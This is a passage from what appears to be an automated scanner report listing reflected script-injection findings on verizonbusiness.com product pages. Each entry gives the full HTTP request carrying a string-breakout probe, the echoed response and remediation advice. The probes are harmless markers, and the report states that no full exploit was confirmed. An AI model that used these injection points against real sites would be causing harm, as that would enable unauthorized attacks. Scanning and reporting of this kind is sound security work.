User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:09 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43486
Date: Wed, 17 Nov 2010 00:44:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/contact-center9e288';eb8b904ab32/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.42. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e9a"%3bf9a14e6c415 was submitted in the REST URL parameter 3. This input was echoed as f3e9a";f9a14e6c415 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/contact-centerf3e9a"%3bf9a14e6c415/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
i="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/contact-centerf3e9a";f9a14e6c415/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.43. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad22'%3b3de738e46d4 was submitted in the REST URL parameter 1. This input was echoed as 1ad22';3de738e46d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1ad22'%3b3de738e46d4/communications/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products1ad22';3de738e46d4/communications/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.44. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63c4c"%3b7236e4cda84 was submitted in the REST URL parameter 1. This input was echoed as 63c4c";7236e4cda84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products63c4c"%3b7236e4cda84/communications/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40666
Date: Wed, 17 Nov 2010 00:44:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products63c4c";7236e4cda84/communications/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.45. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56940"%3b303ea88508d was submitted in the REST URL parameter 2. This input was echoed as 56940";303ea88508d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications56940"%3b303ea88508d/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications56940";303ea88508d/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.46. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce46d'%3b78d243a9c42 was submitted in the REST URL parameter 2. This input was echoed as ce46d';78d243a9c42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsce46d'%3b78d243a9c42/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsce46d';78d243a9c42/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.47. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef4ff"%3b4d41ee83708 was submitted in the REST URL parameter 3. This input was echoed as ef4ff";4d41ee83708 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/emergencyef4ff"%3b4d41ee83708/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/emergencyef4ff";4d41ee83708/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.48. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 373c0'%3b2b9a291dace was submitted in the REST URL parameter 3. This input was echoed as 373c0';2b9a291dace in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/emergency373c0'%3b2b9a291dace/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43478
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/emergency373c0';2b9a291dace/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.49. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe88b'%3b8bd8495a52e was submitted in the REST URL parameter 1. This input was echoed as fe88b';8bd8495a52e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfe88b'%3b8bd8495a52e/communications/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsfe88b';8bd8495a52e/communications/ip-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.50. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f1d"%3ba7a15a8513 was submitted in the REST URL parameter 1. This input was echoed as e5f1d";a7a15a8513 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse5f1d"%3ba7a15a8513/communications/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productse5f1d";a7a15a8513/communications/ip-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.51. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a365'%3b0ddb097a2 was submitted in the REST URL parameter 2. This input was echoed as 1a365';0ddb097a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications1a365'%3b0ddb097a2/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications1a365';0ddb097a2/ip-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.52. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4194a"%3b2625f85d351 was submitted in the REST URL parameter 2. This input was echoed as 4194a";2625f85d351 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications4194a"%3b2625f85d351/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications4194a";2625f85d351/ip-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.53. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b406"%3b1b48f2f8d17 was submitted in the REST URL parameter 3. This input was echoed as 4b406";1b48f2f8d17 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ip-telephony4b406"%3b1b48f2f8d17/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/ip-telephony4b406";1b48f2f8d17/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.54. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e393e'%3b5bc61607e6b was submitted in the REST URL parameter 3. This input was echoed as e393e';5bc61607e6b in the application's response.

